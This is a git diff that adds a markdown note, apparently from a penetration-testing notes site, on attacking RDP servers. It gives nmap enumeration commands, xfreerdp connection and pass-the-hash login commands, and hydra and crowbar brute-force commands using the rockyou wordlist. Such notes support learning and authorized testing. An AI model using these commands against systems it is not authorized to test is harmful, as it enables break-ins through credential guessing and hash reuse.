diff --git a/src/content/notes/network/rdp.md b/src/content/notes/network/rdp.md
new file mode 100644
index 0000000..4131e69
--- /dev/null
+++ b/src/content/notes/network/rdp.md
@@ -0,0 +1,46 @@
+---
+title: "RDP"
+description: "Enumeration, exploitation and post-exploitation techniques for RDP servers."
+tags: ["rdp", "network", "service"]
+publishDate: 2026-05-04
+---
+
+## Overview
+
+RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session.
+Common on Windows servers and workstations.
+
+## Enumeration
+
+### Banner grabbing
+
+```bash
+nmap -sV -p 3389 $IP
+nmap -p 3389 --script rdp-* $IP
+```
+
+Key scripts:
+
+- `rdp-enum-encryption`: checks encryption level
+- `rdp-vuln-ms12-020`: tests for MS12-020 DoS vulnerability
+
+## Connect
+
+```bash
+xfreerdp /u:$user /p:$password /v:$IP
+xfreerdp /u:$user /p:$password /v:$IP /cert:ignore
+rdesktop $IP
+```
+
+Pass the hash directly (no plaintext password needed):
+
+```bash
+xfreerdp /u:$user /pth:$hash /v:$IP
+```
+
+## Brute Force
+
+```bash
+hydra -l $user -P ~/wordlists/rockyou.txt rdp://$IP
+crowbar -b rdp -s $IP/32 -u $user -C ~/wordlists/rockyou.txt
+```